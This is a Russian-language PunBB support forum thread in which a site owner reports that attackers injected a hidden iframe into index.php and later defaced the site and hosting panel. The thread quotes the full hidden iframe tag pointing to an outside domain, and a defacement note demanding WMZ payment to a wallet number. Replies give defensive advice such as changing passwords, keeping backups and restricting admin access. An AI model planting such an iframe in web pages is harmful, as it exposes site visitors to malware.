|
Фонд моральной поддержки |
|
Вы не вошли. Пожалуйста, войдите или зарегистрируйтесь.
PunBB по-русски → Общие вопросы → Злоумышленники испортили форум - iframe в index.php
Чтобы отправить ответ, вы должны войти или зарегистрироваться
Каким-то образом мне на форум в файл index.php добисали в конец файла:
<iframe src="http://tosto-vik.ru/index.php?sall=Bad" width="0" height="0" style="display:none;"></iframe>Это привело к тому, что форум перестал вообще работать и выдавал ошибку php о синтаксисе.
Подскажите, как это могла произойти?
Как мне не допустить подобного в будущем?
Хранить пароли не в тотал-командере и поставить антивирус.
hcs, спасибо за совет.
Но у меня лунукс, плюс к тому доступ к FileZilla дополнительно закрыт.
Может хостер "лукавит"?
Права доступа кстати какие на файл стоят. Я однажды закинул файлы с разрешением на запись для всех )))
Кстати, я больше люблю gftp, но сейчас тоже FileZilla.
Возможно, незнаю, недавно с ним дело имею. Если вероятность того, что это в нем причина велика, могу уйти. 
Права на файл 644.
hcs, спасибо. Пароли уже сменил. Но никак не могу понять как так получилось.
Зайдя в хостинг-аккаунд обнаружил что отсутствуют Логи использования Apache и Логи ошибок Apache.
Это может что-то значить для меня (не разбираюсь в этом)?
Вот еще нашел информацию:
avnar.ru/all/attention-viruses-2/#comments
(У меня не бест-хостер.)
Ну видимо поимели хостера твоего, может трафик прослушали да собрали пароли к аккаунтам, не везде он шифруется.
Добавлено спустя 1 минуту 35 секунд:
ты пароли сменил, теперь только держи руку на пульсе, сделай бэкапы, и не переживай особо.
Сообщи о случившемся хостеру, пусть тоже в затылке почешутся.
Спасибо. Бэкапы сделаны. 
Вот и логичное развитие событий. На сайте теперь это, хотя все важные пароли были заменены:
0wn3d by -=M.o.B=-
if you want to know how, email me your details & send 20WMZ to: Z385450145510
Thank you.
Самое плохое, что я не знаю откуда "растут ноги".
Искал по поисковику... хостинг вроде у всех разный:
yandex.ru/yandsearch?clid=9582&a … 5450145510
С хостером связывался?
Да. Недавно ответили:
"Добрый день.
Злоумышленниками проводится массовая атака на сервер.
Работа будет восстановлена в ближайшее время, приносим извинения за предоставленные неудобства.
Если после восстановления работы проблема у вас останется, пожалуйста уведомите нас."
Значит ли это что с моим скриптом и паролями все в порядке и проблем при переезде на другой хостинг все будет в порядке?
Видимо да, проблема в хостере.
а что за хостер? совдеповский?
Хостер lite-host.in
Добавлено спустя 34 минуты 22 секунды:
Захожу в свой аккаунд в DirectAdmin, переходу по ссылке "Интерфейс phpMyAdmin", а там кое же:
"0wn3d by -=M.o.B=-
if you want to know how, email me your details & send 20WMZ to: Z385450145510
Thank you."
Хотя в разделе "Управление MySQL" база есть.
По ftp зайти тоже не могу.
'Это какие-то реселлеры. Нормальный хостер давно бы закрыл дырку. Что тебя там держит?
Добавлено спустя 2 минуты 28 секунд:
Компания LITE-HOST.IN была образована 1 декабря 2007 года.
Мы стремимся постоянно повышать качество предоставляемых сервисов и расширяя список предлагаемых услуг.
Если Вы ищете надежную хостинг компанию – обратитесь в LITE-HOST.IN Мы будем рады заняться обслуживанием Вашего проекта.
Очень лаконичное "О нас", ни адреса, ничего, звонить на деревню дедушке, сапорт по мылу в рабочее время. Ну это твой выбор, что сказать еще.
hcs, понятно, спасибо. Я вот еще к best-hoster.ru приглядываюсь, может быть знаете о нем что-нибудь? У меня 3 небольших сайта, поэтому рассматриваю очень недорогие тарифы (3 сайта, 3 базы, неогр. траф.).
Jino попробуй, там расчеты по калькулятору, так что можешь за месяц заплатить, не понравится уйти.
coordinator, спасибо. У меня на этом калькуляторе вышло минимум 117.00 руб./мес. - дорого.
Полгода назад испытывал подобные приключения со своим сайтом. Спасал только бэкап, пока разбирался с проблемой. За неделю 4 раза ломали. Посидел в форумах и как итог
- никаких ftp-клиентов (сайт у меня маленький, торопиться мне некуда, а одной уязвимостью меньше)
- смена ВСЕХ паролей
- обязательная защита файлом .htaccess (просто в освоении и достаточно эффективно - в админку вход со строго ограниченного числа ip-адресов, в идеале вообще один. А после просмотра логов ip, с которого проводилась атака вообще в запрете, от греха подальше)
- после любых изменений бэкап обязателен, сохраняю 3-5 последних и еще парочку после массовых изменений
Но если Direct Admin "хлопнули" - ты ничем не застрахуешься у этого хостера. Как ломали так и будут ломать. Пора менять хостера...
podarok66, спасибо! Застрахуюсь как смогу. Данные дороже... 
у меня такое было, на всех сайтах при краже паролей с ftp-клиента - хотя с linux странно... 
Andrey_1cov, сейчас уже выяснилось что я ни причем. Ломали целиком хостера. (
p.s. все бльше и больше нравится ubuntu...
Вот хрень, сегодня всё утро проковырялся, у меня то же самое Фрейм ведет на другой адрес, но принцип тот же. Обнаруживает только avast, HTML:Iframe-inf.
Самое плохое, что скорее всего, это не ваша вина.
Чтобы отправить ответ, вы должны войти или зарегистрироваться
PunBB по-русски → Общие вопросы → Злоумышленники испортили форум - iframe в index.php
Сгенерировано за 0.095 секунды (83% PHP — 17% БД) 11 запросов к базе данных
Технологии с открытым исходным кодом, несомненно, обладают серьезным преимуществом над аналогичными продуктами, распространяемыми по ограниченным лицензиям. И совершенно неважно, что это. Возможно это:
Впрочем, неважно. Что бы это ни было, важно всячески поощрять и поддерживать Open Source в любом виде. Тем более, что вы знаете, PunBB распространяется по лицензии GPL/GNU. И спасибо за внимание.